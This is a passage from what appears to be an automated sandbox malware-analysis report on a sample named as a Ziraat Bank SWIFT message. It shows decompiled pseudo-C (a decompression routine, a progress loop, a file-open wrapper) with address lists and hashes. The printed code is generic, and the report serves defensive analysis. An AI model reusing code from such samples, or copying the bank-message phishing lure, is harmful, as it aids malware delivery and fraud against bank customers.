                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                  														L111:
                                  														_t368 = __ebp - 0x48;
                                  														 *_t368 =  *(__ebp - 0x48) + 1;
                                  														__eflags =  *_t368;
                                  														goto L112;
                                  													} else {
                                  														goto L109;
                                  													}
                                  												}
                                  												__ecx =  *(__ebp - 0xc);
                                  												__ebx = __ebx + __ebx;
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                  												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  												 *(__ebp - 0x44) = __ebx;
                                  												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                  													__ecx =  *(__ebp - 0x10);
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  													__ebx = __ebx | 0x00000001;
                                  													__eflags = __ebx;
                                  													 *(__ebp - 0x44) = __ebx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													L101:
                                  													_t338 = __ebp - 0x48;
                                  													 *_t338 =  *(__ebp - 0x48) - 1;
                                  													__eflags =  *_t338;
                                  													goto L102;
                                  												} else {
                                  													goto L99;
                                  												}
                                  											}
                                  											__edx =  *(__ebp - 4);
                                  											__eax = __eax - __ebx;
                                  											 *(__ebp - 0x40) = __ecx;
                                  											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                  											goto L108;
                                  										case 0x1a:
                                  											L56:
                                  											__eflags =  *(__ebp - 0x64);
                                  											if( *(__ebp - 0x64) == 0) {
                                  												 *(__ebp - 0x88) = 0x1a;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x68);
                                  											__al =  *(__ebp - 0x5c);
                                  											__edx =  *(__ebp - 8);
                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  											 *( *(__ebp - 0x68)) = __al;
                                  											__ecx =  *(__ebp - 0x14);
                                  											 *(__ecx +  *(__ebp - 8)) = __al;
                                  											__eax = __ecx + 1;
                                  											__edx = 0;
                                  											_t192 = __eax %  *(__ebp - 0x74);
                                  											__eax = __eax /  *(__ebp - 0x74);
                                  											__edx = _t192;
                                  											goto L79;
                                  										case 0x1b:
                                  											L75:
                                  											__eflags =  *(__ebp - 0x64);
                                  											if( *(__ebp - 0x64) == 0) {
                                  												 *(__ebp - 0x88) = 0x1b;
                                  												goto L170;
                                  											}
                                  											__eax =  *(__ebp - 0x14);
                                  											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  											__eflags = __eax -  *(__ebp - 0x74);
                                  											if(__eax >=  *(__ebp - 0x74)) {
                                  												__eax = __eax +  *(__ebp - 0x74);
                                  												__eflags = __eax;
                                  											}
                                  											__edx =  *(__ebp - 8);
                                  											__cl =  *(__eax + __edx);
                                  											__eax =  *(__ebp - 0x14);
                                  											 *(__ebp - 0x5c) = __cl;
                                  											 *(__eax + __edx) = __cl;
                                  											__eax = __eax + 1;
                                  											__edx = 0;
                                  											_t274 = __eax %  *(__ebp - 0x74);
                                  											__eax = __eax /  *(__ebp - 0x74);
                                  											__edx = _t274;
                                  											__eax =  *(__ebp - 0x68);
                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  											_t283 = __ebp - 0x64;
                                  											 *_t283 =  *(__ebp - 0x64) - 1;
                                  											__eflags =  *_t283;
                                  											 *( *(__ebp - 0x68)) = __cl;
                                  											L79:
                                  											 *(__ebp - 0x14) = __edx;
                                  											goto L80;
                                  										case 0x1c:
                                  											while(1) {
                                  												L123:
                                  												__eflags =  *(__ebp - 0x64);
                                  												if( *(__ebp - 0x64) == 0) {
                                  													break;
                                  												}
                                  												__eax =  *(__ebp - 0x14);
                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  												__eflags = __eax -  *(__ebp - 0x74);
                                  												if(__eax >=  *(__ebp - 0x74)) {
                                  													__eax = __eax +  *(__ebp - 0x74);
                                  													__eflags = __eax;
                                  												}
                                  												__edx =  *(__ebp - 8);
                                  												__cl =  *(__eax + __edx);
                                  												__eax =  *(__ebp - 0x14);
                                  												 *(__ebp - 0x5c) = __cl;
                                  												 *(__eax + __edx) = __cl;
                                  												__eax = __eax + 1;
                                  												__edx = 0;
                                  												_t414 = __eax %  *(__ebp - 0x74);
                                  												__eax = __eax /  *(__ebp - 0x74);
                                  												__edx = _t414;
                                  												__eax =  *(__ebp - 0x68);
                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                  												__eflags =  *(__ebp - 0x30);
                                  												 *( *(__ebp - 0x68)) = __cl;
                                  												 *(__ebp - 0x14) = _t414;
                                  												if( *(__ebp - 0x30) > 0) {
                                  													continue;
                                  												} else {
                                  													L80:
                                  													 *(__ebp - 0x88) = 2;
                                  													goto L1;
                                  												}
                                  											}
                                  											 *(__ebp - 0x88) = 0x1c;
                                  											goto L170;
                                  									}
                                  								}
                                  								L171:
                                  								_t535 = _t534 | 0xffffffff;
                                  								goto L172;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}













                                  0x00000000
                                  0x00406355
                                  0x00406355
                                  0x00406359
                                  0x00406382
                                  0x0040638c
                                  0x0040635b
                                  0x00406364
                                  0x00406371
                                  0x00406374
                                  0x004066b8
                                  0x004066b8
                                  0x004066bb
                                  0x004066bb
                                  0x004066bb
                                  0x004066c1
                                  0x004066c7
                                  0x004066cd
                                  0x004066e7
                                  0x004066ea
                                  0x004066f0
                                  0x004066fb
                                  0x004066fd
                                  0x004066cf
                                  0x004066cf
                                  0x004066de
                                  0x004066e2
                                  0x004066e2
                                  0x00406707
                                  0x00000000
                                  0x00000000
                                  0x00406709
                                  0x0040670d
                                  0x004068bc
                                  0x004068d2
                                  0x004068da
                                  0x004068e1
                                  0x004068e3
                                  0x004068ea
                                  0x004068ee
                                  0x004068ee
                                  0x00406719
                                  0x00406720
                                  0x00406728
                                  0x0040672b
                                  0x0040672e
                                  0x0040672e
                                  0x00406734
                                  0x00406734
                                  0x00405ed0
                                  0x00405ed0
                                  0x00405ed0
                                  0x00405ed9
                                  0x00000000
                                  0x00000000
                                  0x00405edf
                                  0x00000000
                                  0x00405eea
                                  0x00000000
                                  0x00000000
                                  0x00405ef3
                                  0x00405ef6
                                  0x00405ef9
                                  0x00405efd
                                  0x00000000
                                  0x00000000
                                  0x00405f03
                                  0x00405f06
                                  0x00405f08
                                  0x00405f09
                                  0x00405f0c
                                  0x00405f0e
                                  0x00405f0f
                                  0x00405f11
                                  0x00405f14
                                  0x00405f19
                                  0x00405f1e
                                  0x00405f27
                                  0x00405f3a
                                  0x00405f3d
                                  0x00405f49
                                  0x00405f71
                                  0x00405f73
                                  0x00405f81
                                  0x00405f81
                                  0x00405f85
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405f75
                                  0x00405f75
                                  0x00405f78
                                  0x00405f79
                                  0x00405f79
                                  0x00000000
                                  0x00405f75
                                  0x00405f4f
                                  0x00405f54
                                  0x00405f54
                                  0x00405f5d
                                  0x00405f65
                                  0x00405f68
                                  0x00000000
                                  0x00405f6e
                                  0x00405f6e
                                  0x00000000
                                  0x00405f6e
                                  0x00000000
                                  0x00405f8b
                                  0x00405f8b
                                  0x00405f8f
                                  0x0040683b
                                  0x00000000
                                  0x0040683b
                                  0x00405f98
                                  0x00405fa8
                                  0x00405fab
                                  0x00405fae
                                  0x00405fae
                                  0x00405fae
                                  0x00405fb1
                                  0x00405fb5
                                  0x00000000
                                  0x00000000
                                  0x00405fb7
                                  0x00405fbd
                                  0x00405fe7
                                  0x00405fed
                                  0x00405ff4
                                  0x00000000
                                  0x00405ff4
                                  0x00405fc3
                                  0x00405fc6
                                  0x00405fcb
                                  0x00405fcb
                                  0x00405fd6
                                  0x00405fde
                                  0x00405fe1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406026
                                  0x0040602c
                                  0x0040602f
                                  0x0040603c
                                  0x00406044
                                  0x004066b8
                                  0x00000000
                                  0x00000000
                                  0x00405ffb
                                  0x00405ffb
                                  0x00405fff
                                  0x0040684a
                                  0x00000000
                                  0x0040684a
                                  0x0040600b
                                  0x00406016
                                  0x00406016
                                  0x00406016
                                  0x00406019
                                  0x0040601c
                                  0x0040601f
                                  0x00406024
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004066bb
                                  0x004066bb
                                  0x004066c1
                                  0x004066c7
                                  0x004066cd
                                  0x004066e7
                                  0x004066ea
                                  0x004066f0
                                  0x004066fb
                                  0x004066fd
                                  0x004066cf
                                  0x004066cf
                                  0x004066de
                                  0x004066e2
                                  0x004066e2
                                  0x00406707
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040604c
                                  0x0040604e
                                  0x00406051
                                  0x004060c2
                                  0x004060c5
                                  0x004060c8
                                  0x004060cf
                                  0x004060d9
                                  0x004066b8
                                  0x004066b8
                                  0x00000000
                                  0x004066b8
                                  0x004066b8
                                  0x00406053
                                  0x00406057
                                  0x0040605a
                                  0x0040605c
                                  0x0040605f
                                  0x00406062
                                  0x00406064
                                  0x00406067
                                  0x00406069
                                  0x0040606e
                                  0x00406071
                                  0x00406074
                                  0x00406078
                                  0x0040607f
                                  0x00406082
                                  0x00406089
                                  0x0040608d
                                  0x00406095
                                  0x00406095
                                  0x00406095
                                  0x0040608f
                                  0x0040608f
                                  0x0040608f
                                  0x00406084
                                  0x00406084
                                  0x00406084
                                  0x00406099
                                  0x0040609c
                                  0x004060ba
                                  0x004060bc
                                  0x00000000
                                  0x0040609e
                                  0x0040609e
                                  0x004060a1
                                  0x004060a4
                                  0x004060a7
                                  0x004060a9
                                  0x004060a9
                                  0x004060a9
                                  0x004060ac
                                  0x004060af
                                  0x004060b1
                                  0x004060b2
                                  0x004060b5
                                  0x00000000
                                  0x004060b5
                                  0x00000000
                                  0x004062eb
                                  0x004062ef
                                  0x0040630d
                                  0x00406310
                                  0x00406317
                                  0x0040631a
                                  0x0040631d
                                  0x00406320
                                  0x00406323
                                  0x00406326
                                  0x00406328
                                  0x0040632f
                                  0x00406330
                                  0x00406332
                                  0x00406335
                                  0x00406338
                                  0x0040633b
                                  0x0040633b
                                  0x00406340
                                  0x00000000
                                  0x00406340
                                  0x004062f1
                                  0x004062f4
                                  0x004062f7
                                  0x00406301
                                  0x004066b8
                                  0x004066b8
                                  0x00000000
                                  0x004066b8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406398
                                  0x0040639c
                                  0x00000000
                                  0x00000000
                                  0x004063a2
                                  0x004063a6
                                  0x00000000
                                  0x00000000
                                  0x004063ac
                                  0x004063ae
                                  0x004063b2
                                  0x004063b2
                                  0x004063b5
                                  0x004063b9
                                  0x00000000
                                  0x00000000
                                  0x00406409
                                  0x0040640d
                                  0x00406414
                                  0x00406417
                                  0x0040641a
                                  0x00406424
                                  0x004066b8
                                  0x004066b8
                                  0x00000000
                                  0x004066b8
                                  0x004066b8
                                  0x0040640f
                                  0x00000000
                                  0x00000000
                                  0x00406430
                                  0x00406434
                                  0x0040643b
                                  0x0040643e
                                  0x00406441
                                  0x00406436
                                  0x00406436
                                  0x00406436
                                  0x00406444
                                  0x00406447
                                  0x0040644a
                                  0x0040644a
                                  0x0040644d
                                  0x00406450
                                  0x00406453
                                  0x00406453
                                  0x00406456
                                  0x0040645d
                                  0x00406462
                                  0x00000000
                                  0x00000000
                                  0x004064f0
                                  0x004064f0
                                  0x004064f4
                                  0x00406892
                                  0x00000000
                                  0x00406892
                                  0x004064fa
                                  0x004064fd
                                  0x00406500
                                  0x00406504
                                  0x00406507
                                  0x0040650d
                                  0x0040650f
                                  0x0040650f
                                  0x0040650f
                                  0x00406512
                                  0x00406515
                                  0x00000000
                                  0x00000000
                                  0x004060e5
                                  0x004060e5
                                  0x004060e9
                                  0x00406856
                                  0x00000000
                                  0x00406856
                                  0x004060ef
                                  0x004060f2
                                  0x004060f5
                                  0x004060f9
                                  0x004060fc
                                  0x00406102
                                  0x00406104
                                  0x00406104
                                  0x00406104
                                  0x00406107
                                  0x0040610a
                                  0x0040610a
                                  0x0040610d
                                  0x00406110
                                  0x00000000
                                  0x00000000
                                  0x00406116
                                  0x0040611c
                                  0x00000000
                                  0x00000000
                                  0x00406122
                                  0x00406122
                                  0x00406126
                                  0x00406129
                                  0x0040612c
                                  0x0040612f
                                  0x00406132
                                  0x00406133
                                  0x00406136
                                  0x00406138
                                  0x0040613e
                                  0x00406141
                                  0x00406144
                                  0x00406147
                                  0x0040614a
                                  0x0040614d
                                  0x00406150
                                  0x0040616c
                                  0x0040616f
                                  0x00406172
                                  0x00406175
                                  0x0040617c
                                  0x00406180
                                  0x00406182
                                  0x00406186
                                  0x00406152
                                  0x00406152
                                  0x00406156
                                  0x0040615e
                                  0x00406163
                                  0x00406165
                                  0x00406167
                                  0x00406167
                                  0x00406189
                                  0x00406190
                                  0x00406193
                                  0x00000000
                                  0x00406199
                                  0x00000000
                                  0x00406199
                                  0x00000000
                                  0x0040619e
                                  0x0040619e
                                  0x004061a2
                                  0x00406862
                                  0x00000000
                                  0x00406862
                                  0x004061a8
                                  0x004061ab
                                  0x004061ae
                                  0x004061b2
                                  0x004061b5
                                  0x004061bb
                                  0x004061bd
                                  0x004061bd
                                  0x004061bd
                                  0x004061c0
                                  0x004061c3
                                  0x004061c3
                                  0x004061c3
                                  0x004061c9
                                  0x00000000
                                  0x00000000
                                  0x004061cb
                                  0x004061ce
                                  0x004061d1
                                  0x004061d4
                                  0x004061d7
                                  0x004061da
                                  0x004061dd
                                  0x004061e0
                                  0x004061e3
                                  0x004061e6
                                  0x004061e9
                                  0x00406201
                                  0x00406204
                                  0x00406207
                                  0x0040620a
                                  0x0040620a
                                  0x0040620d
                                  0x00406211
                                  0x00406213
                                  0x004061eb
                                  0x004061eb
                                  0x004061f3
                                  0x004061f8
                                  0x004061fa
                                  0x004061fc
                                  0x004061fc
                                  0x00406216
                                  0x0040621d
                                  0x00406220
                                  0x00000000
                                  0x00406222
                                  0x00000000
                                  0x00406222
                                  0x00406220
                                  0x00406227
                                  0x00406227
                                  0x00406227
                                  0x00406227
                                  0x00000000
                                  0x00000000
                                  0x00406262
                                  0x00406262
                                  0x00406266
                                  0x0040686e
                                  0x00000000
                                  0x0040686e
                                  0x0040626c
                                  0x0040626f
                                  0x00406272
                                  0x00406276
                                  0x00406279
                                  0x0040627f
                                  0x00406281
                                  0x00406281
                                  0x00406281
                                  0x00406284
                                  0x00406287
                                  0x00406287
                                  0x0040628d
                                  0x0040622b
                                  0x0040622b
                                  0x0040622e
                                  0x00000000
                                  0x0040622e
                                  0x0040628f
                                  0x0040628f
                                  0x00406292
                                  0x00406295
                                  0x00406298
                                  0x0040629b
                                  0x0040629e
                                  0x004062a1
                                  0x004062a4
                                  0x004062a7
                                  0x004062aa
                                  0x004062ad
                                  0x004062c5
                                  0x004062c8
                                  0x004062cb
                                  0x004062ce
                                  0x004062ce
                                  0x004062d1
                                  0x004062d5
                                  0x004062d7
                                  0x004062af
                                  0x004062af
                                  0x004062b7
                                  0x004062bc
                                  0x004062be
                                  0x004062c0
                                  0x004062c0
                                  0x004062da
                                  0x004062e1
                                  0x004062e4
                                  0x00000000
                                  0x004062e6
                                  0x00000000
                                  0x004062e6
                                  0x00000000
                                  0x00406573
                                  0x00406573
                                  0x00406577
                                  0x0040689e
                                  0x00000000
                                  0x0040689e
                                  0x0040657d
                                  0x00406580
                                  0x00406583
                                  0x00406587
                                  0x0040658a
                                  0x00406590
                                  0x00406592
                                  0x00406592
                                  0x00406592
                                  0x00406595
                                  0x00000000
                                  0x00000000
                                  0x00406343
                                  0x00406343
                                  0x00406346
                                  0x004066b8
                                  0x004066b8
                                  0x00000000
                                  0x004066b8
                                  0x00000000
                                  0x00406682
                                  0x00406686
                                  0x004066a8
                                  0x004066ab
                                  0x004066b5
                                  0x004066b8
                                  0x004066b8
                                  0x00000000
                                  0x004066b8
                                  0x004066b8
                                  0x00406688
                                  0x0040668b
                                  0x0040668f
                                  0x00406692
                                  0x00406692
                                  0x00406695
                                  0x00000000
                                  0x00000000
                                  0x0040673f
                                  0x00406743
                                  0x00406761
                                  0x00406761
                                  0x00406761
                                  0x00406768
                                  0x0040676f
                                  0x00406776
                                  0x00406776
                                  0x00000000
                                  0x00406776
                                  0x00406745
                                  0x00406748
                                  0x0040674b
                                  0x0040674e
                                  0x00406755
                                  0x00406699
                                  0x00406699
                                  0x0040669c
                                  0x00000000
                                  0x00000000
                                  0x00406830
                                  0x00406833
                                  0x00406734
                                  0x00000000
                                  0x00000000
                                  0x0040646a
                                  0x0040646c
                                  0x00406473
                                  0x00406474
                                  0x00406476
                                  0x00406479
                                  0x00000000
                                  0x00000000
                                  0x00406481
                                  0x00406484
                                  0x00406487
                                  0x00406489
                                  0x0040648b
                                  0x0040648b
                                  0x0040648c
                                  0x0040648f
                                  0x00406496
                                  0x00406499
                                  0x004064a7
                                  0x00000000
                                  0x00000000
                                  0x0040677d
                                  0x0040677d
                                  0x00406780
                                  0x00406787
                                  0x00000000
                                  0x00000000
                                  0x0040678c
                                  0x0040678c
                                  0x00406790
                                  0x004068c8
                                  0x00000000
                                  0x004068c8
                                  0x00406796
                                  0x00406799
                                  0x0040679c
                                  0x004067a0
                                  0x004067a3
                                  0x004067a9
                                  0x004067ab
                                  0x004067ab
                                  0x004067ab
                                  0x004067ae
                                  0x004067b1
                                  0x004067b1
                                  0x004067b1
                                  0x004067b1
                                  0x004067b4
                                  0x004067b4
                                  0x004067b8
                                  0x00406818
                                  0x0040681b
                                  0x00406820
                                  0x00406821
                                  0x00406823
                                  0x00406825
                                  0x00406828
                                  0x00406734
                                  0x00406734
                                  0x00000000
                                  0x0040673a
                                  0x00406734
                                  0x004067ba
                                  0x004067c0
                                  0x004067c3
                                  0x004067c6
                                  0x004067c9
                                  0x004067cc
                                  0x004067cf
                                  0x004067d2
                                  0x004067d5
                                  0x004067d8
                                  0x004067db
                                  0x004067f4
                                  0x004067f7
                                  0x004067fa
                                  0x004067fd
                                  0x00406801
                                  0x00406803
                                  0x00406803
                                  0x00406804
                                  0x00406807
                                  0x004067dd
                                  0x004067dd
                                  0x004067e5
                                  0x004067ea
                                  0x004067ec
                                  0x004067ef
                                  0x004067ef
                                  0x0040680a
                                  0x00406811
                                  0x00000000
                                  0x00406813
                                  0x00000000
                                  0x00406813
                                  0x00000000
                                  0x004064af
                                  0x004064b2
                                  0x004064e8
                                  0x00406618
                                  0x00406618
                                  0x00406618
                                  0x00406618
                                  0x0040661b
                                  0x0040661b
                                  0x0040661e
                                  0x00406620
                                  0x004068aa
                                  0x00000000
                                  0x004068aa
                                  0x00406626
                                  0x00406629
                                  0x00000000
                                  0x00000000
                                  0x0040662f
                                  0x00406633
                                  0x00406636
                                  0x00406636
                                  0x00406636
                                  0x00000000
                                  0x00406636
                                  0x004064b4
                                  0x004064b6
                                  0x004064b8
                                  0x004064ba
                                  0x004064bd
                                  0x004064be
                                  0x004064c0
                                  0x004064c2
                                  0x004064c5
                                  0x004064c8
                                  0x004064de
                                  0x004064e3
                                  0x0040651b
                                  0x0040651b
                                  0x0040651f
                                  0x0040654b
                                  0x0040654d
                                  0x00406554
                                  0x00406557
                                  0x0040655a
                                  0x0040655a
                                  0x0040655f
                                  0x0040655f
                                  0x00406561
                                  0x00406564
                                  0x0040656b
                                  0x0040656e
                                  0x0040659b
                                  0x0040659b
                                  0x0040659e
                                  0x004065a1
                                  0x00406615
                                  0x00406615
                                  0x00406615
                                  0x00000000
                                  0x00406615
                                  0x004065a3
                                  0x004065a9
                                  0x004065ac
                                  0x004065af
                                  0x004065b2
                                  0x004065b5
                                  0x004065b8
                                  0x004065bb
                                  0x004065be
                                  0x004065c1
                                  0x004065c4
                                  0x004065dd
                                  0x004065df
                                  0x004065e2
                                  0x004065e3
                                  0x004065e6
                                  0x004065e8
                                  0x004065eb
                                  0x004065ed
                                  0x004065ef
                                  0x004065f2
                                  0x004065f4
                                  0x004065f7
                                  0x004065fb
                                  0x004065fd
                                  0x004065fd
                                  0x004065fe
                                  0x00406601
                                  0x00406604
                                  0x004065c6
                                  0x004065c6
                                  0x004065ce
                                  0x004065d3
                                  0x004065d5
                                  0x004065d8
                                  0x004065d8
                                  0x00406607
                                  0x0040660e
                                  0x00406598
                                  0x00406598
                                  0x00406598
                                  0x00406598
                                  0x00000000
                                  0x00406610
                                  0x00000000
                                  0x00406610
                                  0x0040660e
                                  0x00406521
                                  0x00406524
                                  0x00406526
                                  0x00406529
                                  0x0040652c
                                  0x0040652f
                                  0x00406531
                                  0x00406534
                                  0x00406537
                                  0x00406537
                                  0x0040653a
                                  0x0040653a
                                  0x0040653d
                                  0x00406544
                                  0x00406518
                                  0x00406518
                                  0x00406518
                                  0x00406518
                                  0x00000000
                                  0x00406546
                                  0x00000000
                                  0x00406546
                                  0x00406544
                                  0x004064ca
                                  0x004064cd
                                  0x004064cf
                                  0x004064d2
                                  0x00000000
                                  0x00000000
                                  0x00406231
                                  0x00406231
                                  0x00406235
                                  0x0040687a
                                  0x00000000
                                  0x0040687a
                                  0x0040623b
                                  0x0040623e
                                  0x00406241
                                  0x00406244
                                  0x00406247
                                  0x0040624a
                                  0x0040624d
                                  0x0040624f
                                  0x00406252
                                  0x00406255
                                  0x00406258
                                  0x0040625a
                                  0x0040625a
                                  0x0040625a
                                  0x00000000
                                  0x00000000
                                  0x004063bc
                                  0x004063bc
                                  0x004063c0
                                  0x00406886
                                  0x00000000
                                  0x00406886
                                  0x004063c6
                                  0x004063c9
                                  0x004063cc
                                  0x004063cf
                                  0x004063d1
                                  0x004063d1
                                  0x004063d1
                                  0x004063d4
                                  0x004063d7
                                  0x004063da
                                  0x004063dd
                                  0x004063e0
                                  0x004063e3
                                  0x004063e4
                                  0x004063e6
                                  0x004063e6
                                  0x004063e6
                                  0x004063e9
                                  0x004063ec
                                  0x004063ef
                                  0x004063f2
                                  0x004063f2
                                  0x004063f2
                                  0x004063f5
                                  0x004063f7
                                  0x004063f7
                                  0x00000000
                                  0x00000000
                                  0x00406639
                                  0x00406639
                                  0x00406639
                                  0x0040663d
                                  0x00000000
                                  0x00000000
                                  0x00406643
                                  0x00406646
                                  0x00406649
                                  0x0040664c
                                  0x0040664e
                                  0x0040664e
                                  0x0040664e
                                  0x00406651
                                  0x00406654
                                  0x00406657
                                  0x0040665a
                                  0x0040665d
                                  0x00406660
                                  0x00406661
                                  0x00406663
                                  0x00406663
                                  0x00406663
                                  0x00406666
                                  0x00406669
                                  0x0040666c
                                  0x0040666f
                                  0x00406672
                                  0x00406676
                                  0x00406678
                                  0x0040667b
                                  0x00000000
                                  0x0040667d
                                  0x004063fa
                                  0x004063fa
                                  0x00000000
                                  0x004063fa
                                  0x0040667b
                                  0x004068b0
                                  0x00000000
                                  0x00000000
                                  0x00405edf
                                  0x004068e7
                                  0x004068e7
                                  0x00000000
                                  0x004068e7
                                  0x00406734
                                  0x004066bb
                                  0x004066b8

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                                  • Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
                                  • Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                                  • Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 69%
                                  			E00401389(signed int _a4) {
                                  				intOrPtr* _t6;
                                  				void* _t8;
                                  				void* _t10;
                                  				signed int _t11;
                                  				void* _t12;
                                  				signed int _t16;
                                  				signed int _t17;
                                  				void* _t18;
                                  
                                  				_t17 = _a4;
                                  				while(_t17 >= 0) {
                                  					_t6 = _t17 * 0x1c +  *0x423ed0;
                                  					if( *_t6 == 1) {
                                  						break;
                                  					}
                                  					_push(_t6); // executed
                                  					_t8 = E00401434(); // executed
                                  					if(_t8 == 0x7fffffff) {
                                  						return 0x7fffffff;
                                  					}
                                  					_t10 = E0040136D(_t8);
                                  					if(_t10 != 0) {
                                  						_t11 = _t10 - 1;
                                  						_t16 = _t17;
                                  						_t17 = _t11;
                                  						_t12 = _t11 - _t16;
                                  					} else {
                                  						_t12 = _t10 + 1;
                                  						_t17 = _t17 + 1;
                                  					}
                                  					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                  						 *0x42368c =  *0x42368c + _t12;
                                  						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
                                  					}
                                  				}
                                  				return 0;
                                  			}











                                  0x0040138a
                                  0x004013fa
                                  0x0040139b
                                  0x004013a0
                                  0x00000000
                                  0x00000000
                                  0x004013a2
                                  0x004013a3
                                  0x004013ad
                                  0x00000000
                                  0x00401404
                                  0x004013b0
                                  0x004013b7
                                  0x004013bd
                                  0x004013be
                                  0x004013c0
                                  0x004013c2
                                  0x004013b9
                                  0x004013b9
                                  0x004013ba
                                  0x004013ba
                                  0x004013c9
                                  0x004013cb
                                  0x004013f4
                                  0x004013f4
                                  0x004013c9
                                  0x00000000

                                  APIs
                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                  • SendMessageA.USER32 ref: 004013F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                  • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                                  • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                  • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E0040575C(CHAR* _a4, long _a8, long _a12) {
                                  				signed int _t5;
                                  				void* _t6;
                                  
                                  				_t5 = GetFileAttributesA(_a4); // executed
                                  				asm("sbb ecx, ecx");
                                  				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                  				return _t6;
                                  			}





                                  0x00405760
                                  0x0040576d
                                  0x00405782
                                  0x00405788

                                  APIs
                                  • GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe,80000000,00000003), ref: 00405760
                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: File$AttributesCreate
                                  • String ID:
